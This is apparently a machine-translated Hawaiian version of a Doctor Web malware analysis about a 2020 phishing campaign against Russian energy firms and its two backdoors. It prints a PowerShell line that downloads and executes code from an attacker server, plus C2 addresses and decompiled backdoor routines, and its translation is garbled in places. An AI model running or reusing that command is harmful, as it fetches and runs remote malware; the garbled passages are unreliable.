ʻO kā mākou ʻike i ka noiʻi ʻana i nā hanana palekana kamepiula e hōʻike ana ʻo ka leka uila kekahi o nā ala maʻamau i hoʻohana ʻia e ka poʻe hoʻouka kaua e komo mua i nā ʻoihana pūnaewele i hoʻouka ʻia. Hoʻokahi hana mālama ʻole me kahi leka kānalua (a ʻaʻole kānalua paha) e lilo i wahi komo no ka maʻi hou aʻe, ʻo ia ke kumu e hoʻohana ikaika ai nā cybercriminals i nā ʻano hana ʻenekinia, ʻoiai me nā pae like ʻole o ka holomua.
Ma kēia pou makemake mākou e kamaʻilio e pili ana i kā mākou noiʻi hou ʻana i kahi hoʻolaha spam e kuhikuhi ana i kekahi o nā ʻoihana i ka wahie a me ka ikehu Lūkini. Ua like nā hoʻouka kaua a pau me ka hoʻohana ʻana i nā leka uila hoʻopunipuni, a ʻaʻohe mea i hoʻoikaika nui i ka kikokikona o kēia mau leka uila.
ʻOihana naʻauao
Ua hoʻomaka ʻia i ka hopena o ʻApelila 2020, i ka wā i ʻike ai nā mea noiʻi ʻo Doctor Web virus i kahi hoʻolaha spam kahi i hoʻouna ai nā mea hackers i kahi papa kuhikuhi kelepona hou i nā limahana o nā ʻoihana he nui o ka wahie a me ka ikehu Lūkia. ʻOiaʻiʻo, ʻaʻole kēia he hōʻike maʻalahi o ka hopohopo, ʻoiai ʻaʻole maoli ka papa kuhikuhi, a ua hoʻoiho nā palapala .docx i ʻelua kiʻi mai nā kumuwaiwai mamao.
Hoʻoiho ʻia kekahi o lākou i ka kamepiula o ka mea hoʻohana mai ka nūhou [.]zannews[.]com server. He mea pono ke hoʻomaopopo ʻia ua like ka inoa kikowaena me ka domain o ka anti-corruption media center o Kazakhstan - zannews[.]kz. Ma ka ʻaoʻao ʻē aʻe, ua hoʻomanaʻo koke ka ʻaoʻao i hoʻohana ʻia i kahi hoʻolaha 2015 ʻē aʻe i kapa ʻia ʻo TOPNEWS, nāna i hoʻohana i kahi backdoor ICEFOG a loaʻa iā Trojan control domains me ka substring "news" ma ko lākou mau inoa. ʻO kekahi hiʻohiʻona hoihoi ʻo ia i ka hoʻouna ʻana i nā leka uila i nā mea loaʻa like ʻole, nā noi e hoʻoiho i kahi kiʻi i hoʻohana ʻia i nā ʻāpana noi like ʻole a i ʻole nā inoa kiʻi kūʻokoʻa.
Manaʻo mākou ua hana ʻia kēia no ka hōʻiliʻili ʻana i ka ʻike e ʻike ai i kahi ʻōlelo "hilinaʻi", a laila e hōʻoia ʻia e wehe i ka leka i ka manawa kūpono. Ua hoʻohana ʻia ka protocol SMB e kiʻi i ke kiʻi mai ke kikowaena lua, hiki ke hana ʻia e hōʻiliʻili i nā hashes NetNTLM mai nā kamepiula o nā limahana nāna i wehe i ka palapala i loaʻa.
A eia ka leka pono'ī me ka papa kuhikuhi hoʻopunipuni:
I Iune o kēia makahiki, hoʻomaka ka poʻe hackers e hoʻohana i kahi inoa inoa hou, haʻuki[.]manhajnews[.]com, e hoʻouka i nā kiʻi. Ua hōʻike ʻia ka loiloi ua hoʻohana ʻia nā subdomains manhajnews[.]com i nā leka uila mai ka liʻiliʻi o Kepakemapa 2019. ʻO kekahi o nā pahuhopu o kēia hoʻolaha ʻana he kulanui nui ʻo Rūsia.
Eia kekahi, ma Iune, ua loaʻa i nā mea hoʻonohonoho o ka hoʻouka ʻana i kahi kikokikona hou no kā lākou mau leka: i kēia manawa aia ka palapala i ka ʻike e pili ana i ka hoʻomohala ʻana i ka ʻoihana. ʻO ka kikokikona o ka leka i hōʻike maopopo ʻia ʻaʻole ʻo kāna mea kākau he kamaʻāina ʻōlelo Lūkini, a i ʻole e hoʻokumu i kahi manaʻo e pili ana iā ia iho. ʻO ka mea pōʻino, ua lilo nā manaʻo o ka hoʻomohala ʻana i ka ʻoihana, e like me nā manawa a pau, he uhi wale nō - ua hoʻoiho hou ka palapala i nā kiʻi ʻelua, ʻoiai ua hoʻololi ʻia ke kikowaena e hoʻoiho [.]inklingpaper[.]com.
ʻO ka hana hou i hala ma Iulai. I ka hoʻāʻo ʻana e kāpae i ka ʻike ʻana i nā palapala ʻino e nā polokalamu antivirus, hoʻomaka nā mea hoʻouka e hoʻohana i nā palapala Microsoft Word i hoʻopili ʻia me kahi ʻōlelo huna. I ka manawa like, ua hoʻoholo ka poʻe hoʻouka e hoʻohana i kahi ʻenehana ʻenekinia maʻamau - hoʻolaha uku.
Ua kākau hou ʻia ke ʻano o ka hoʻopiʻi ʻana ma ke ʻano like, a ua hoʻāla hou ʻia ka kānalua i waena o ka mea hoʻopuka. ʻAʻole i loli ke kikowaena no ka hoʻoiho ʻana i ke kiʻi.
E hoʻomaopopo i nā hihia a pau, ua hoʻohana ʻia nā pahu leka uila i hoʻopaʻa inoa ʻia ma ka leka uila [.]ru a me yandex[.]ru domains no ka hoʻouna ʻana i nā leka.
Hoʻowaka
I ka hoʻomaka ʻana o Kepakemapa 2020, ʻo ia ka manawa no ka hana. Ua hoʻopaʻa kā mākou mea loiloi virus i kahi nalu hou o ka hoʻouka ʻana, kahi i hoʻouna hou ai nā mea hoʻouka i nā leka ma lalo o ke kumu o ka hoʻonui ʻana i kahi papa kuhikuhi kelepona. Eia nō naʻe, i kēia manawa ua loaʻa i ka mea hoʻopili kahi macro ʻino.
I ka wehe ʻana i ka palapala i hoʻopili ʻia, ua hana ka macro i ʻelua faila:
- ʻO ka palapala VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, i manaʻo ʻia e hoʻomaka i kahi faila hui;
- ʻO ka waihona puʻupuʻu ponoʻī %APPDATA%configstest.bat, i hoʻopili ʻia.
ʻO ke kumu o kāna hana e iho mai i ka hoʻokuʻu ʻana i ka shell Powershell me kekahi mau ʻāpana. Hoʻokaʻawale ʻia nā ʻāpana i hāʻawi ʻia i ka pūpū i nā kauoha:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Ma muli o nā kauoha i hōʻike ʻia, ua hoʻololi hou ʻia ke kahua kahi i hoʻoiho ʻia ai ka uku uku. He maʻalahi , ʻo kāna hana wale nō ka loaʻa ʻana o ka shellcode mai ke kikowaena kauoha a me ka hoʻokele a hoʻokō. Ua hiki iā mākou ke ʻike i ʻelua ʻano o nā puka kua i hiki ke hoʻokomo ʻia ma ka PC o ka mea i pepehi ʻia.
BackDoor.Siggen2.3238
ʻO ka mea mua BackDoor.Siggen2.3238 — ʻaʻole i ʻike mua kā mākou poʻe loea, a ʻaʻohe mea i ʻōlelo ʻia no kēia papahana e nā mea kūʻai antivirus ʻē aʻe.
He puka hope kēia papahana i kākau ʻia ma C++ a e holo ana ma nā ʻōnaehana hana Windows 32-bit.
BackDoor.Siggen2.3238 hiki iā ia ke kamaʻilio me ke kikowaena hoʻokele me ka hoʻohana ʻana i ʻelua protocols: HTTP a me HTTPS. Hoʻohana ka laʻana i hoʻāʻo ʻia i ka protocol HTTPS. Hoʻohana ʻia kēia mea hoʻohana-Agent i nā noi i ke kikowaena:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
I kēia hihia, hāʻawi ʻia nā noi a pau me ka hoʻonohonoho o nā ʻāpana:
%s;type=%s;length=%s;realdata=%send
kahi i hoʻololi like ʻia ai kēlā me kēia laina %s e:
- ID o ka lolouila ma'i,
- ʻano noi e hoʻouna ʻia ana,
- ka lōʻihi o ka ʻikepili ma ke kahua realdata,
- ʻikepili.
I ka pae o ka ʻohi ʻana i ka ʻike e pili ana i ka ʻōnaehana maʻi, hana ka backdoor i kahi laina e like me:
lan=%s;cmpname=%s;username=%s;version=%s;
ʻo ka lan ka IP address o ka lolouila maʻi, ʻo cmpname ka inoa kamepiula, ʻo ka inoa inoa ka inoa mea hoʻohana, ʻo ka mana ka laina 0.0.4.03.
Hoʻouna ʻia kēia ʻike me ka sysinfo identifier ma o kahi noi POST i ke kikowaena mana aia ma https[:]//31.214[.]157.14/log.txt. Inā ma ka pane BackDoor.Siggen2.3238 loaʻa iā ia ka hōʻailona HEART, ua manaʻo ʻia ua kūleʻa ka pilina, a hoʻomaka ka backdoor i ka pōʻai nui o ke kamaʻilio me ke kikowaena.
ʻO ka wehewehe piha ʻana o nā loina hana BackDoor.Siggen2.3238 aia i loko o kā mākou .
Puka.Whitebird.23
ʻO ka lua o ka papahana he hoʻololi o ka BackDoor.Whitebird backdoor, i ʻike mua ʻia e mākou mai ka hanana me kahi hui aupuni ma Kazakhstan. Ua kākau ʻia kēia mana ma C++ a ua hoʻolālā ʻia e holo ma nā ʻōnaehana hana Windows 32-bit a me 64-bit.
E like me ka nui o nā polokalamu o kēia ʻano, Puka.Whitebird.23 i hoʻolālā ʻia e hoʻokumu i kahi pilina i hoʻopili ʻia me ke kikowaena mana a me ka mana ʻae ʻole o kahi kamepiula i hoʻopili ʻia. Hoʻokomo ʻia i loko o kahi ʻōnaehana compromised me ka hoʻohana ʻana i kahi dropper .
ʻO ka laʻana a mākou i nānā ai he hale waihona puke ʻino me ʻelua mau hoʻoiho:
- Google Play
- Hōʻoia.
I ka hoʻomaka ʻana o kāna hana, hoʻokaʻawale ia i ka hoʻonohonoho paʻa i loko o ke kino backdoor me ka hoʻohana ʻana i kahi algorithm e pili ana i ka hana XOR me ka byte 0x99. Ua like ka hoʻonohonoho ʻana:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
No ka hōʻoia ʻana i kāna hana mau, hoʻololi ka backdoor i ka waiwai i kuhikuhi ʻia ma ke kahua hola hana nā hoʻonohonoho. Aia i loko o ke kahua he 1440 bytes, e lawe ana i nā waiwai 0 a i ʻole 1 a hōʻike i kēlā me kēia minuke o kēlā me kēia hola o ka lā. Hoʻokumu i kahi pae ʻokoʻa no kēlā me kēia kikowaena pūnaewele e hoʻolohe ana i ka interface a nānā i nā ʻeke ʻae ʻia ma ka server proxy mai ka lolouila maʻi. Ke ʻike ʻia kēlā ʻeke, hoʻohui ka backdoor i ka ʻike e pili ana i ka server proxy i kāna papa inoa. Eia kekahi, e nānā i ka hele ʻana o kahi mea koho ma o WinAPI InternetQueryOptionW.
Nānā ka polokalamu i ka minuke a me ka hola o kēia manawa a hoʻohālikelike me ka ʻikepili i ke kahua hola hana nā hoʻonohonoho. Inā ʻaʻole ʻole ka waiwai no ka minuke like o ka lā, a laila ua hoʻokumu ʻia kahi pilina me ke kikowaena mana.
ʻO ka hoʻokumu ʻana i kahi pilina i ke kikowaena e hoʻohālike i ka hana ʻana i kahi pilina me ka hoʻohana ʻana i ka protocol TLS version 1.0 ma waena o ka mea kūʻai aku a me ke kikowaena. Aia i ke kino o ka puka hope ʻelua mau pale.
Loaʻa i ka pale mua ka ʻeke TLS 1.0 Client Hello.
Aia ka lua o ka pahu pahu i nā ʻeke TLS 1.0 Client Key Exchange me ka lōʻihi kī o 0x100 bytes, Change Cipher Spec, Encrypted Handshake Message.
I ka hoʻouna ʻana i kahi packet Hello Client, kākau ka puka hope i 4 bytes o kēia manawa a me 28 bytes o ka ʻikepili pseudo-random ma ka Client Random field, i helu ʻia penei:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Hoʻouna ʻia ka ʻeke i loaʻa i ke kikowaena mana. Ka pane (Server Hello packet) nānā:
- ka hoʻokō ʻana me ka mana TLS protocol version 1.0;
- ka leka o ka timestamp (ka mua 4 bytes o ka Random Data packet field) i kuhikuhi ʻia e ka mea kūʻai aku i ka timestamp i kuhikuhi ʻia e ke kikowaena;
- e hoʻohālikelike i nā 4 bytes mua ma hope o ka timestamp ma ke kahua ʻikepili Random o ka mea kūʻai aku a me ke kikowaena.
I ka hihia o nā pāʻani i ʻōlelo ʻia, hoʻomākaukau ka puka hope i kahi ʻeke Client Key Exchange. No ka hana ʻana i kēia, hoʻololi ʻo ia i ka Public Key i loko o ka Client Key Exchange package, a me ka Encryption IV a me ka ʻikepili hoʻopili i loko o ka pūʻolo leka uila i hoʻopaʻa ʻia.
Loaʻa i ka puka hope ka ʻeke mai ke kikowaena kauoha a me ka mālama ʻana, e nānā i ka mana o ka protocol TLS he 1.0, a laila e ʻae i kahi 54 bytes (ke kino o ka ʻeke). Hoʻopau kēia i ka hoʻonohonoho pili.
ʻO ka wehewehe piha ʻana o nā loina hana Puka.Whitebird.23 aia i loko o kā mākou .
Hoʻoholo a me ka hopena
ʻO ka nānā ʻana i nā palapala, malware, a me nā ʻōnaehana i hoʻohana ʻia e ʻae iā mākou e ʻōlelo me ka hilinaʻi ua hoʻomākaukau ʻia ka hoʻouka kaua e kekahi o nā hui APT Kina. Ke noʻonoʻo nei i ka hana o nā puka hope i hoʻokomo ʻia ma nā kamepiula o ka poʻe i hōʻeha ʻia i ka hopena o ka hoʻouka kaua ʻana, alakaʻi ka maʻi, ma ka liʻiliʻi loa, i ka ʻaihue o ka ʻike huna mai nā kamepiula o nā hui i hoʻouka ʻia.
Eia kekahi, ʻo kahi hiʻohiʻona hiki ke hoʻokomo i nā Trojans kūikawā ma nā kikowaena kūloko me kahi hana kūikawā. ʻO kēia paha nā mea hoʻoponopono domain, nā leka uila, nā puka pūnaewele, a pēlā aku. E like me kā mākou e ʻike ai ma ka laʻana , makemake nui ia mau kikowaena i nā mea hoʻouka no nā kumu like ʻole.
Source: www.habr.com